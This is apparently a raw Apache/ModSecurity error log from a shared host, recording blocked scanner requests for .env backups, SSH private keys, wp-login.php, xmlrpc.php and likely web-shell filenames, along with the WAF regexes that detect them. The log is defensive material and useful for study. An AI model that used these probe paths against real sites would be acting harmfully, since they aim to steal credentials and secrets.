[Tue May 26 14:33:44.057335 2026] [security2:error] [pid 626747:tid 626957] [client 208.84.100.165:49248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.swp"] [unique_id "ahVh8BVF8Qmdmw_OMfLhdAAAAVo"]
[Tue May 26 14:33:44.057454 2026] [security2:error] [pid 626747:tid 626967] [client 208.84.100.165:49450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.old"] [unique_id "ahVh8BVF8Qmdmw_OMfLhdwAAAWQ"]
[Tue May 26 14:33:44.058431 2026] [security2:error] [pid 626747:tid 626969] [client 208.84.100.165:49302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.backup"] [unique_id "ahVh8BVF8Qmdmw_OMfLheAAAAWY"]
[Tue May 26 14:33:45.184121 2026] [security2:error] [pid 626747:tid 626965] [client 4.204.220.190:44892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/bob.php"] [unique_id "ahVh8RVF8Qmdmw_OMfLhngAAAWI"]
[Tue May 26 14:33:45.184225 2026] [security2:error] [pid 626747:tid 626965] [client 4.204.220.190:44892] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/bob.php"] [unique_id "ahVh8RVF8Qmdmw_OMfLhngAAAWI"]
[Tue May 26 14:33:45.442529 2026] [security2:error] [pid 626747:tid 626897] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh8RVF8Qmdmw_OMfLhkwAAAR4"]
[Tue May 26 14:33:46.992189 2026] [security2:error] [pid 626747:tid 626904] [client 4.204.220.190:21636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/t3s.php"] [unique_id "ahVh8hVF8Qmdmw_OMfLhyQAAASU"]
[Tue May 26 14:33:46.992325 2026] [security2:error] [pid 626747:tid 626904] [client 4.204.220.190:21636] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/t3s.php"] [unique_id "ahVh8hVF8Qmdmw_OMfLhyQAAASU"]
[Tue May 26 14:33:47.102090 2026] [security2:error] [pid 626747:tid 626785] [remote 52.18.195.140:54102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVh8hVF8Qmdmw_OMfLhxAABZSU"]
[Tue May 26 14:33:47.352764 2026] [security2:error] [pid 626747:tid 626975] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh8hVF8Qmdmw_OMfLhxwAAAWw"]
[Tue May 26 14:33:47.566759 2026] [security2:error] [pid 626747:tid 626879] [client 202.141.83.254:53960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh8xVF8Qmdmw_OMfLh1wAAAQw"]
[Tue May 26 14:33:47.566872 2026] [security2:error] [pid 626747:tid 626879] [client 202.141.83.254:53960] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh8xVF8Qmdmw_OMfLh1wAAAQw"]
[Tue May 26 14:33:48.238113 2026] [proxy:error] [pid 626747:tid 626952] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:48.238171 2026] [proxy_http:error] [pid 626747:tid 626952] [client 4.204.220.190:53251] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:48.238802 2026] [proxy:error] [pid 626747:tid 626952] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:48.238844 2026] [proxy_http:error] [pid 626747:tid 626952] [client 4.204.220.190:53251] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:48.238939 2026] [security2:error] [pid 626747:tid 626952] [client 4.204.220.190:53251] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh9BVF8Qmdmw_OMfLh7AAAAVU"]
[Tue May 26 14:33:49.676723 2026] [proxy:error] [pid 626747:tid 626999] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:49.676801 2026] [proxy_http:error] [pid 626747:tid 626999] [client 4.204.220.190:21426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:49.677360 2026] [proxy:error] [pid 626747:tid 626999] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:49.677395 2026] [proxy_http:error] [pid 626747:tid 626999] [client 4.204.220.190:21426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:49.677508 2026] [security2:error] [pid 626747:tid 626999] [client 4.204.220.190:21426] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh9RVF8Qmdmw_OMfLiJQAAAYQ"]
[Tue May 26 14:33:49.872739 2026] [security2:error] [pid 626747:tid 626957] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh9RVF8Qmdmw_OMfLiGgAAAVo"]
[Tue May 26 14:33:50.236879 2026] [proxy:error] [pid 626747:tid 626898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:50.236985 2026] [proxy_http:error] [pid 626747:tid 626898] [client 4.204.220.190:45481] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:50.237883 2026] [proxy:error] [pid 626747:tid 626898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:50.237933 2026] [proxy_http:error] [pid 626747:tid 626898] [client 4.204.220.190:45481] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:50.238073 2026] [security2:error] [pid 626747:tid 626898] [client 4.204.220.190:45481] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh9hVF8Qmdmw_OMfLiNgAAAR8"]
[Tue May 26 14:33:51.510337 2026] [security2:error] [pid 626747:tid 626906] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh9xVF8Qmdmw_OMfLiSwAAASc"]
[Tue May 26 14:33:51.629894 2026] [security2:error] [pid 626747:tid 626957] [client 4.204.220.190:44927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/uwu.php"] [unique_id "ahVh9xVF8Qmdmw_OMfLiXAAAAVo"]
[Tue May 26 14:33:51.630030 2026] [security2:error] [pid 626747:tid 626957] [client 4.204.220.190:44927] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/uwu.php"] [unique_id "ahVh9xVF8Qmdmw_OMfLiXAAAAVo"]
[Tue May 26 14:33:52.477053 2026] [security2:error] [pid 626747:tid 626965] [client 114.119.150.168:22247] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVh-BVF8Qmdmw_OMfLidwAAAWI"], referer: http://glorodavionics.com/index.php?route=product%2Fcategory&path=72_25_106
[Tue May 26 14:33:52.679479 2026] [security2:error] [pid 626747:tid 626878] [client 4.204.220.190:21414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/uwa.php"] [unique_id "ahVh-BVF8Qmdmw_OMfLihQAAAQs"]
[Tue May 26 14:33:52.679580 2026] [security2:error] [pid 626747:tid 626878] [client 4.204.220.190:21414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/uwa.php"] [unique_id "ahVh-BVF8Qmdmw_OMfLihQAAAQs"]
[Tue May 26 14:33:53.679381 2026] [security2:error] [pid 626747:tid 627000] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh-RVF8Qmdmw_OMfLilAAAAYU"]
[Tue May 26 14:33:53.735291 2026] [security2:error] [pid 626747:tid 626898] [client 4.204.220.190:12650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/crgio.php"] [unique_id "ahVh-RVF8Qmdmw_OMfLiqwAAAR8"]
[Tue May 26 14:33:53.735436 2026] [security2:error] [pid 626747:tid 626898] [client 4.204.220.190:12650] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/crgio.php"] [unique_id "ahVh-RVF8Qmdmw_OMfLiqwAAAR8"]
[Tue May 26 14:33:53.930508 2026] [security2:error] [pid 626747:tid 626820] [remote 103.230.156.120:60164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVh-RVF8Qmdmw_OMfLipwABL0g"]
[Tue May 26 14:33:54.860311 2026] [security2:error] [pid 626747:tid 626959] [client 85.121.127.31:60628] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.env.old"] [unique_id "ahVh-hVF8Qmdmw_OMfLi3wAAAVw"]
[Tue May 26 14:33:55.052921 2026] [security2:error] [pid 626747:tid 626984] [client 85.121.127.31:60278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLi6gAAAXU"]
[Tue May 26 14:33:55.053177 2026] [security2:error] [pid 626747:tid 626914] [client 85.121.127.31:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/backend/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLi7wAAAS8"]
[Tue May 26 14:33:55.054056 2026] [security2:error] [pid 626747:tid 626938] [client 85.121.127.31:60298] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVh-xVF8Qmdmw_OMfLi7gAAAUc"]
[Tue May 26 14:33:55.056385 2026] [security2:error] [pid 626747:tid 626984] [client 85.121.127.31:60284] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.env.bak"] [unique_id "ahVh-xVF8Qmdmw_OMfLi_AAAAXU"]
[Tue May 26 14:33:55.057665 2026] [security2:error] [pid 626747:tid 626878] [client 85.121.127.31:60294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/app/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLjAQAAAQs"]
[Tue May 26 14:33:55.057879 2026] [security2:error] [pid 626747:tid 626882] [client 85.121.127.31:60282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.env.backup"] [unique_id "ahVh-xVF8Qmdmw_OMfLi-wAAAQ8"]
[Tue May 26 14:33:55.058907 2026] [security2:error] [pid 626747:tid 626941] [client 85.121.127.31:60296] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/public/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLi_gAAAUo"]
[Tue May 26 14:33:55.059013 2026] [security2:error] [pid 626747:tid 626895] [client 85.121.127.31:60288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/api/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLjBQAAARw"]
[Tue May 26 14:33:55.058709 2026] [security2:error] [pid 626747:tid 626918] [client 85.121.127.31:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVh-xVF8Qmdmw_OMfLjAAAAATM"]
[Tue May 26 14:33:55.188456 2026] [security2:error] [pid 626747:tid 626908] [client 4.204.220.190:12456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/geforce.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjCgAAASk"]
[Tue May 26 14:33:55.188576 2026] [security2:error] [pid 626747:tid 626908] [client 4.204.220.190:12456] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/geforce.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjCgAAASk"]
[Tue May 26 14:33:55.708651 2026] [security2:error] [pid 626747:tid 626934] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjEAAAAUM"]
[Tue May 26 14:33:55.749214 2026] [security2:error] [pid 626747:tid 626971] [client 4.204.220.190:53279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/pucci.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjJgAAAWg"]
[Tue May 26 14:33:55.749381 2026] [security2:error] [pid 626747:tid 626971] [client 4.204.220.190:53279] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/pucci.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjJgAAAWg"]
[Tue May 26 14:33:56.241603 2026] [proxy:error] [pid 626747:tid 626879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:56.241747 2026] [proxy_http:error] [pid 626747:tid 626879] [client 4.204.220.190:21669] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:56.242485 2026] [proxy:error] [pid 626747:tid 626879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:56.242519 2026] [proxy_http:error] [pid 626747:tid 626879] [client 4.204.220.190:21669] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:56.242635 2026] [security2:error] [pid 626747:tid 626879] [client 4.204.220.190:21669] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh_BVF8Qmdmw_OMfLjTgAAAQw"]
[Tue May 26 14:33:56.909825 2026] [proxy:error] [pid 626747:tid 626916] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:56.909897 2026] [proxy_http:error] [pid 626747:tid 626916] [client 4.204.220.190:38621] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:56.910465 2026] [proxy:error] [pid 626747:tid 626916] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:56.910500 2026] [proxy_http:error] [pid 626747:tid 626916] [client 4.204.220.190:38621] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:56.910609 2026] [security2:error] [pid 626747:tid 626916] [client 4.204.220.190:38621] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh_BVF8Qmdmw_OMfLjYAAAATE"]
[Tue May 26 14:33:57.263934 2026] [security2:error] [pid 626747:tid 626975] [client 4.204.220.190:12652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/one.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjZwAAAWw"]
[Tue May 26 14:33:57.264063 2026] [security2:error] [pid 626747:tid 626975] [client 4.204.220.190:12652] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/one.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjZwAAAWw"]
[Tue May 26 14:33:57.453291 2026] [security2:error] [pid 626747:tid 626958] [client 4.204.220.190:45484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wp-temp.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjcwAAAVs"]
[Tue May 26 14:33:57.453439 2026] [security2:error] [pid 626747:tid 626958] [client 4.204.220.190:45484] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wp-temp.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjcwAAAVs"]
[Tue May 26 14:33:57.756723 2026] [security2:error] [pid 626747:tid 626927] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjbwAAATw"]
[Tue May 26 14:33:57.895686 2026] [security2:error] [pid 626747:tid 626881] [client 14.187.90.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjdQAAAQ4"]
[Tue May 26 14:33:58.107640 2026] [security2:error] [pid 626747:tid 626877] [client 202.141.83.254:53808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjnAAAAQo"]
